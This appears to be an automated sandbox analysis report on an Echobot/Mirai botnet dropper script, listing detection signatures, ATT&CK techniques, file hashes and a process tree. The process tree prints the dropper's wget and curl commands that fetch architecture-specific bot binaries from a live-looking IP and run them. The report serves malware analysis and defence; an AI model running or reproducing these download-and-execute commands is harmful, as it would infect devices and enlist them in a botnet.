echobot | 7a091ce1dfccdfff5db4938ebd85a0a088b255a1ddc0bae4431e160316ef8995

Analysis

max time kernel
149s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
10/01/2025, 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

17bed510a00fcaba1dfad2de86d3f0ac
SHA1

bd93c9b1642d9291731933387f1d751c85c6d323
SHA256

7a091ce1dfccdfff5db4938ebd85a0a088b255a1ddc0bae4431e160316ef8995
SHA512

27d29c3a78b954855c5d29b13a1f69fe8b5fdc4ac4533eccc82a35aab6cf3b9cf34b6990e09fe4fa1a35397bc0d786ecec3fb1b97d8d66cf8e5ef0ebdd149dc9

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 3 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_echobot
behavioral4/files/fstream-4.dat	family_echobot
behavioral4/files/fstream-5.dat	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (189725) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
855	chmod
869	chmod
883	chmod
735	chmod
741	chmod
759	chmod
785	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/3AvA	736	3AvA
/tmp/3AvA	742	3AvA
/tmp/3AvA	760	3AvA
/tmp/3AvA	786	3AvA
/tmp/3AvA	856	3AvA
/tmp/3AvA	870	3AvA
/tmp/3AvA	884	3AvA

Modifies Watchdog functionality 1 TTPs 8 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA

Enumerates active TCP sockets 1 TTPs 5 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 4 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	c1pmppphj2ohmmdh1c2	760	3AvA
Changes the process name, possibly in an attempt to hide itself	kipgb4bi0bj05beoofd	786	3AvA
Changes the process name, possibly in an attempt to hide itself	543gaf0d0bnkgpn0f00	856	3AvA
Changes the process name, possibly in an attempt to hide itself	ao5m5cg5fbi31j	870	3AvA

Reads system network configuration 1 TTPs 5 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/236/fd	3AvA
File opened for reading	/proc/377/fd	3AvA
File opened for reading	/proc/884/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/376/fd	3AvA
File opened for reading	/proc/946/exe	3AvA
File opened for reading	/proc/354/fd	3AvA
File opened for reading	/proc/377/fd	3AvA
File opened for reading	/proc/324/fd	3AvA
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/167/fd	3AvA
File opened for reading	/proc/810/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/167/fd	3AvA
File opened for reading	/proc/704/fd	3AvA
File opened for reading	/proc/432/fd	3AvA
File opened for reading	/proc/319/fd	3AvA
File opened for reading	/proc/956/exe	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/886/fd	3AvA
File opened for reading	/proc/702/exe	3AvA
File opened for reading	/proc/899/exe	3AvA
File opened for reading	/proc/319/fd	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/377/fd	3AvA
File opened for reading	/proc/703/exe	3AvA
File opened for reading	/proc/762/fd	3AvA
File opened for reading	/proc/358/fd	3AvA
File opened for reading	/proc/672/fd	3AvA
File opened for reading	/proc/356/fd	3AvA
File opened for reading	/proc/678/fd	3AvA
File opened for reading	/proc/167/fd	3AvA
File opened for reading	/proc/704/fd	3AvA
File opened for reading	/proc/376/fd	3AvA
File opened for reading	/proc/377/fd	3AvA
File opened for reading	/proc/816/exe	3AvA
File opened for reading	/proc/705/fd	3AvA
File opened for reading	/proc/354/fd	3AvA
File opened for reading	/proc/705/fd	3AvA
File opened for reading	/proc/705/exe	3AvA
File opened for reading	/proc/902/exe	3AvA
File opened for reading	/proc/889/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/354/fd	3AvA
File opened for reading	/proc/236/fd	3AvA
File opened for reading	/proc/236/fd	3AvA
File opened for reading	/proc/700/exe	3AvA
File opened for reading	/proc/677/fd	3AvA
File opened for reading	/proc/144/fd	3AvA
File opened for reading	/proc/672/fd	3AvA
File opened for reading	/proc/432/fd	3AvA
File opened for reading	/proc/677/fd	3AvA
File opened for reading	/proc/936/exe	3AvA
File opened for reading	/proc/667/exe	3AvA
File opened for reading	/proc/857/exe	3AvA
File opened for reading	/proc/358/fd	3AvA
File opened for reading	/proc/909/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/236/fd	3AvA
File opened for reading	/proc/857/fd	3AvA
File opened for reading	/proc/888/fd	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
738	wget
739	curl
740	cat
742	3AvA

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/UnHAnaAW.x86	wget
File opened for modification	/tmp/UnHAnaAW.x86	curl
File opened for modification	/tmp/UnHAnaAW.mpsl	wget
File opened for modification	/tmp/UnHAnaAW.arm5	wget
File opened for modification	/tmp/UnHAnaAW.arm6	wget
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/UnHAnaAW.arm4	curl
File opened for modification	/tmp/UnHAnaAW.arm7	curl
File opened for modification	/tmp/UnHAnaAW.mips	wget
File opened for modification	/tmp/UnHAnaAW.mips	curl
File opened for modification	/tmp/UnHAnaAW.mpsl	curl
File opened for modification	/tmp/UnHAnaAW.arm5	curl
File opened for modification	/tmp/UnHAnaAW.arm7	wget
File opened for modification	/tmp/UnHAnaAW.arm6	curl

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:704
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.x86
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:728
- /bin/cat
  cat UnHAnaAW.x86
  2⤵
  PID:734
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:736
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:738
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:739
- /bin/cat
  cat UnHAnaAW.mips
  2⤵
  - System Network Configuration Discovery
  PID:740
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.mips UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:742
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.mpsl
  2⤵
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:745
- /bin/cat
  cat UnHAnaAW.mpsl
  2⤵
  PID:758
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:760
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.arm4
  2⤵
  PID:765
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:776
- /bin/chmod
  chmod +x 3AvA 8UsA.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-TOyuXJ UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:786
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:819
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.arm5
  2⤵
  - Writes file to tmp directory
  PID:822
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:855
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:856
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:866
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.arm6
  2⤵
  - Writes file to tmp directory
  PID:867
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:870
- /usr/bin/wget
  wget http://141.98.10.115/bins/UnHAnaAW.arm7
  2⤵
  - Writes file to tmp directory
  PID:874
- /usr/bin/curl
  curl -O http://141.98.10.115/bins/UnHAnaAW.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/chmod
  chmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.arm6 UnHAnaAW.arm7 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x86
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
98KB

MD5
e4a5bb69952d1c35c29b3368e8fc17c6

SHA1
6f8e1ba0b25d60ccb607821337a07d533cbf46d0

SHA256
6fed6148fd27b402300a9e3b30e74af00c20af4cb0caa692f69d9e06b7f30eac

SHA512
8c7bf047abb4326a51229a6f777834aecf600a76d2f15f5fb62b529dfb24f81b376cae135993203356f453b7228fbba7a2f0deb77a64660a48294d61346b6583

Download Submit
/tmp/3AvA

Filesize
102KB

MD5
1cd00bebdc0480e95850211e14b24d96

SHA1
19506b0f0cd9a8d66a3907aa11966919034a3cd7

SHA256
64a64aa629ee41ee060556663ff11de272e66e6faf7e82fcec04139e64ed0407

SHA512
234cea8d366c082b3ee4186fddec198cb66bf6fa437ddc676bed3772c5d1f51f53391a5b57c36fc729ac2ad98121ff381dad56a1049919885d010b1b71a91d02

Download Submit
/tmp/UnHAnaAW.x86

Filesize
69KB

MD5
fd52a40caadc60323f116d6c5d428aab

SHA1
abf8f199130a7b6a9a8886708a4e9f1c6c305cfc

SHA256
4de6ec9db86da28a37e3cc1ebd5958856212be7fb403829413277cb091507033

SHA512
d541dbfc62019444bc18561cdf3f823ab75fd78bf73b3debeb2ac145419d7e1f4e0a15fc67deca8f83582ac508ce06ace57c03cac03ec9d0164a7841547a1447

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads